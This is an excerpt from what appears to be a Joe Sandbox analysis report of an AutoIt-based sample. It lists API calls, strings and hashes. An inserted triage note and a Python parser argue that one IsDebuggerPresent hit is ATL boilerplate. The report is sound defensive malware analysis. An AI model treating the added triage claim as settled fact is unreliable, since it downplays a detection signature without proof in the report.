                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BABA
                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E0B69A,?,00008000), ref: 00E0BAED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                                                              • Opcode ID: fdc08fe2723180bc0f502deb0b121f53d7f1cd949e9ae44d270ef43670429cc8
                                                                                                                                                                              • Instruction ID: dc7d89f5e1dfa8e4a2adea782cdd8ac8379d49e83805587ed31964ca34fe70c8
                                                                                                                                                                              • Opcode Fuzzy Hash: fdc08fe2723180bc0f502deb0b121f53d7f1cd949e9ae44d270ef43670429cc8
                                                                                                                                                                              • Instruction Fuzzy Hash: D3117930E0562DEBCF009FE5E9486EEBB78FF09710F100095E941B2180CB3086948BA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E3888E
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00E388A6
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00E388CA
                                                                                                                                                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E388E5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 357397906-0
                                                                                                                                                                              • Opcode ID: c43f4259417c5ee2048f37ab494af110f72045fc1c32b0c2a5b554cb0faf85aa
                                                                                                                                                                              • Instruction ID: d692ff57fca8ab64d1fb951083f214886b035bc7eb7bffd848d3c316a9b0e04d
                                                                                                                                                                              • Opcode Fuzzy Hash: c43f4259417c5ee2048f37ab494af110f72045fc1c32b0c2a5b554cb0faf85aa
                                                                                                                                                                              • Instruction Fuzzy Hash: DE1160B9D0020DAFDB01CFA9D885AEEBBB5FB08314F509166E925E2210D735AA54CF50
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E03712
                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E03723
                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00E0372A
                                                                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E03731
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 05722d7a5cccfeda1d6e0976cf5ed0992ed8e0a3ff7bc8652d5435e669b8774d
• Instruction ID: 7a153ada6d733bfc92893ad42dc83f44517b0a9e38aad54ee94cd47af5d8dc86
• Opcode Fuzzy Hash: 05722d7a5cccfeda1d6e0976cf5ed0992ed8e0a3ff7bc8652d5435e669b8774d
• Instruction Fuzzy Hash: E6E06DF11052287BDA2017A3AC4EEEB7F6CDB52BA1F440016F105F2080DAA08984C2B0
APIs
  • Part of subcall function 00DA1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DA1F87
  • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1F96
  • Part of subcall function 00DA1F2D: BeginPath.GDI32(?), ref: 00DA1FAD
  • Part of subcall function 00DA1F2D: SelectObject.GDI32(?,00000000), ref: 00DA1FD6
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E392E3
• LineTo.GDI32(?,?,?), ref: 00E392F0
• EndPath.GDI32(?), ref: 00E39300
• StrokePath.GDI32(?), ref: 00E3930E
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: 6053819d6f45ca344faf4545572c97db951e86d109e7eef9287fd47690ffccb4
• Instruction ID: c3c080b6ce17d6d144ac1fa9874c1470c492ec70022f48d4c277611474d30d70
• Opcode Fuzzy Hash: 6053819d6f45ca344faf4545572c97db951e86d109e7eef9287fd47690ffccb4
• Instruction Fuzzy Hash: 12F03A3200A658BEDB126F55AC0EFCA3E6AAF4A724F048000FB15351E2C7B55565DFA5
APIs
• GetSysColor.USER32(00000008), ref: 00DA21BC
• SetTextColor.GDI32(?,?), ref: 00DA21C6
• SetBkMode.GDI32(?,00000001), ref: 00DA21D9
• GetStockObject.GDI32(00000005), ref: 00DA21E1
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: 4be45ad4c36b78777af3792371557ae59a6d42dc63cd4a3658bb85a3611c88da
• Instruction ID: 24614de63d85dfa49c37e3dffbb9520188d62fa7d6d4536994b49b250501b8bb
• Opcode Fuzzy Hash: 4be45ad4c36b78777af3792371557ae59a6d42dc63cd4a3658bb85a3611c88da
• Instruction Fuzzy Hash: EFE06531245284BFDB215B76BC0D7E83F51AB12335F088219F7B5640E0C77246449B20
APIs
• GetDesktopWindow.USER32 ref: 00DFEC36
• GetDC.USER32(00000000), ref: 00DFEC40
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFEC60
• ReleaseDC.USER32(?), ref: 00DFEC81
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 309f5e34da5fb53efb72cef9e38ae3700c3b2edf7ffe5927d5f64c8fa50ff39f
• Instruction ID: dd1cc69248b6414942233fb5ccc276bc02734296e7b169c79d7ab8627e46cd23
• Opcode Fuzzy Hash: 309f5e34da5fb53efb72cef9e38ae3700c3b2edf7ffe5927d5f64c8fa50ff39f
• Instruction Fuzzy Hash: D5E0E5B1804208DFCB419FA1AD4DA6DBFB1EB08310B118809E95AE3260C73899059F20
APIs
• GetDesktopWindow.USER32 ref: 00DFEC4A
• GetDC.USER32(00000000), ref: 00DFEC54
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DFEC60
• ReleaseDC.USER32(?), ref: 00DFEC81
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: c1a108227261cfca14861ca3fec443b586ba4428ab3560a1bfd15a617aabdd43
• Instruction ID: 7fc886dd71996dca41c18f2b2efb22fb63cff7f8031d710a98cb934de3a29bc6
• Opcode Fuzzy Hash: c1a108227261cfca14861ca3fec443b586ba4428ab3560a1bfd15a617aabdd43
• Instruction Fuzzy Hash: 43E01AB0C04208DFCB419FB1EC4DA5DBFB1EB08310B108809E85AF3250C7389905DF10
Strings
Similarity
• API ID: LoadString
• String ID: @COM_EVENTOBJ$bn
• API String ID: 2948472770-192135924
• Opcode ID: 4ec27ab8fbdb283d5dac001edb81a7cfa8585107ab1897d0b7da84b4ee1600fc
• Instruction ID: 4a2ea12aa67fe9d36b223d7ab1bf5a7e0e6343bed94dc1a63732ff4abab29dca
• Opcode Fuzzy Hash: 4ec27ab8fbdb283d5dac001edb81a7cfa8585107ab1897d0b7da84b4ee1600fc
• Instruction Fuzzy Hash: 14F1AF70A08305DFD724DF14C841B6AB7E0FF84704F1A891DF68AA7261D775EA45CBA2
APIs
  • Part of subcall function 00DC05B2: EnterCriticalSection.KERNEL32(00E7170C,?,00000000,?,00DAD22A,00E73570,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?), ref: 00DC05BD
  • Part of subcall function 00DC05B2: LeaveCriticalSection.KERNEL32(00E7170C,?,00DAD22A,00E73570,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?,00000001,00E72430), ref: 00DC05FA
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00DC0413: __onexit.LIBCMT ref: 00DC0419
• __Init_thread_footer.LIBCMT ref: 00E28658
  • Part of subcall function 00DC0568: EnterCriticalSection.KERNEL32(00E7170C,00000000,?,00DAD258,00E73570,00DE27C9,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?), ref: 00DC0572
  • Part of subcall function 00DC0568: LeaveCriticalSection.KERNEL32(00E7170C,?,00DAD258,00E73570,00DE27C9,00000001,00000000,?,?,00E1F023,?,?,00000000,00000001,?,00000001), ref: 00DC05A5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: Variable must be of type 'Object'.$bn
• API String ID: 535116098-2837176596
APIs
  • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E15919
Strings
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 00E058AF
Strings
Similarity
• API ID: ContainedObject
• String ID: 0$$Container
• API String ID: 3565006973-836522788
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00DCE67D
Strings
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Strings
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
APIs
• Sleep.KERNEL32(00000000), ref: 00DBF6DB
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00DBF6F4
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00E340BD
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E340F8
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00E350BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E350D2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend
• String ID: '
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
  • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
• GetParent.USER32(?), ref: 00DE3440
• DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00DE34CA
Strings
Similarity
• API ID: LongWindow$ParentProc
• String ID: (
APIs
  • Part of subcall function 00DA7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
  • Part of subcall function 00DA7873: GetStockObject.GDI32(00000011), ref: 00DA78C5
  • Part of subcall function 00DA7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
• GetWindowRect.USER32(00000000,?), ref: 00E34216
• GetSysColor.USER32(00000012), ref: 00E34230
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E1D7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E1D7EB
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
• CharUpperBuffW.USER32(?,?,?), ref: 00E0761D
• _wcslen.LIBCMT ref: 00E07629
Strings
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: STOP
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E02699
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00E02593
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00E02615
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E045FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E04620
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E02720
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00E39B6D
  • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E39B53
Strings
Similarity
• API ID: LongWindow$MessageProcSend
• String ID: (
• API String ID: 982171247-2063206799
APIs
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• GetWindowLongW.USER32(?,000000F0), ref: 00E38471
• GetWindowLongW.USER32(?,000000EC), ref: 00E3847F
Strings
Similarity
• API ID: LongWindow
• String ID: (
• API String ID: 1378638983-2063206799
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E0146F
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
APIs
  • Part of subcall function 00DBFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DC10E2,?,?,?,00DA100A), ref: 00DBFAD9
• IsDebuggerPresent.KERNEL32(?,?,?,00DA100A), ref: 00DC10E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DA100A), ref: 00DC10F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DC10F0
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
• Opcode ID: f7b99adf2d1ac8496ae158e8a59957ec80b0e35f84ea4879f975ebb7e18d1119
• Instruction ID: 75e9e135ccab927724bbbb61487a1521407719a02f7e04afb8088d31c103b948
• Opcode Fuzzy Hash: f7b99adf2d1ac8496ae158e8a59957ec80b0e35f84ea4879f975ebb7e18d1119
• Instruction Fuzzy Hash: 28E06D746003228FD3209F26E809742BFE4EB01300F04892CE986D3252DBB8D488CBB1
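A triage note on the entry above: the IsDebuggerPresent call at 00DC10E6 is not an anti-debugging check by the malware author. It is the stock ATL CAtlBaseModule constructor, which calls IsDebuggerPresent only to decide whether to emit the string "ERROR : Unable to initialize critical section in CAtlBaseModule" through OutputDebugString when InitializeCriticalSectionAndSpinCount fails. The "IsDebuggerPresent" signature in the summary should be weighed accordingly. The script below is an added example, not Joe Sandbox code: it parses function-analysis entries in the exact text format this report uses (APIs / Strings / Memory Dump Source / Similarity blocks) into records and applies that ATL check, so the same rule can be run over a full exported report. The embedded sample text is a shortened, constructed copy of two entries from this page.

```python
"""Parse Joe Sandbox function-analysis entries and triage the IsDebuggerPresent
hit.  Added example, not Joe Sandbox code; SAMPLE is a constructed, shortened
copy of two entries from this report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE = """APIs
  • Part of subcall function 00DBFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DC10E2,?,?,?,00DA100A), ref: 00DBFAD9
• IsDebuggerPresent.KERNEL32(?,?,?,00DA100A), ref: 00DC10E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DA100A), ref: 00DC10F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DC10F0
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• Opcode ID: f7b99adf2d1ac8496ae158e8a59957ec80b0e35f84ea4879f975ebb7e18d1119
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E139F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E13A05
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• Opcode ID: c39642dd8a1dbca6beb31b32e7453c896c5d203703202a5efb14500e4c6f792c
"""

# "• Name.MODULE(args), ref: ADDR"; the args and the parentheses are optional
# ("Sleep.KERNEL32 ref: ..."); subcall lines carry the callee address first.
API_RE = re.compile(r"^• (?:Part of subcall function (?P<callee>[0-9A-F]{8}): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^• (?P<key>[A-Za-z_ ]+): ?(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address in the dump
    via_subcall: Optional[str] = None # callee address when reached through a subcall

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref)
    meta: dict = field(default_factory=dict)  # Similarity / dump-source key-values

def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the report text into entries; every 'APIs' heading starts a new one."""
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["callee"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m["text"], m["ref"]))
        else:
            m = KV_RE.match(line)
            if m:
                cur.meta[m["key"]] = m["value"]
    return entries

ATL_MSG = "ERROR : Unable to initialize critical section in CAtlBaseModule"

def is_atl_init_boilerplate(entry: FunctionEntry) -> bool:
    """True when an IsDebuggerPresent hit is the ATL CAtlBaseModule constructor:
    IsDebuggerPresent gates an OutputDebugString of ATL_MSG and nothing else."""
    names = {a.name for a in entry.apis}
    return ({"IsDebuggerPresent", "OutputDebugStringW"} <= names
            and any(text == ATL_MSG for text, _ in entry.strings))

def temp_file_prefix(entry: FunctionEntry) -> Optional[str]:
    """Prefix passed to GetTempFileNameW (its second argument), if the entry calls it."""
    for a in entry.apis:
        if a.name == "GetTempFileNameW" and len(a.args) >= 2:
            return a.args[1]
    return None

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print([a.name for a in e.apis], "ATL boilerplate:", is_atl_init_boilerplate(e),
              "temp prefix:", temp_file_prefix(e))
```

Running it over a whole exported report lets you drop the ATL false positive from the IsDebuggerPresent list while keeping any other call site, and pulls out the temp-file prefix used by the runtime in the same pass.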
APIs
• __Init_thread_footer.LIBCMT ref: 00DBF151
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: `5$h5
• API String ID: 1385522511-2563461917
• Opcode ID: bd040e859b5f00377105c21e7c9817dc37224080a395065b6a55325da63c9870
• Instruction ID: 769d9aebe2c415c4a0af2ca2c89b148c9c4fb907c0e253db0f0fa38a7c2e1652
• Opcode Fuzzy Hash: bd040e859b5f00377105c21e7c9817dc37224080a395065b6a55325da63c9870
• Instruction Fuzzy Hash: 10E02631404A14DFC640D73CEC02EC83364EB44B20B300579E10BA72918B302A82EB35
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E139F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E13A05
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: c39642dd8a1dbca6beb31b32e7453c896c5d203703202a5efb14500e4c6f792c
• Instruction ID: 5f25f8329fef70b5ee956b3726638aa3b0abc81070d1e4aee203b840dc71b5f0
• Opcode Fuzzy Hash: c39642dd8a1dbca6beb31b32e7453c896c5d203703202a5efb14500e4c6f792c
• Instruction Fuzzy Hash: 69D05B71544318ABDA209765AC0DFCB7E7CDB44750F000191BA95A10A1DAB0D549C790
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E32E08
• PostMessageW.USER32(00000000), ref: 00E32E0F
  • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 3ff45ba4f8268917ec66a8e55186d98a2825e1485ac0d9aa9dca40f672b32d84
• Instruction ID: eb19e22f9585a6be732160fb871cf697dbec1b62149d66bd7e15c57a01f19fc5
• Opcode Fuzzy Hash: 3ff45ba4f8268917ec66a8e55186d98a2825e1485ac0d9aa9dca40f672b32d84
• Instruction Fuzzy Hash: AED0A9313C9304BBE224A330BC0FFC22A549B50B10F100821B245BA0D0C8A068008684
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E32DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E32DDB
  • Part of subcall function 00E0F292: Sleep.KERNEL32 ref: 00E0F30A
Strings
Memory Dump Source
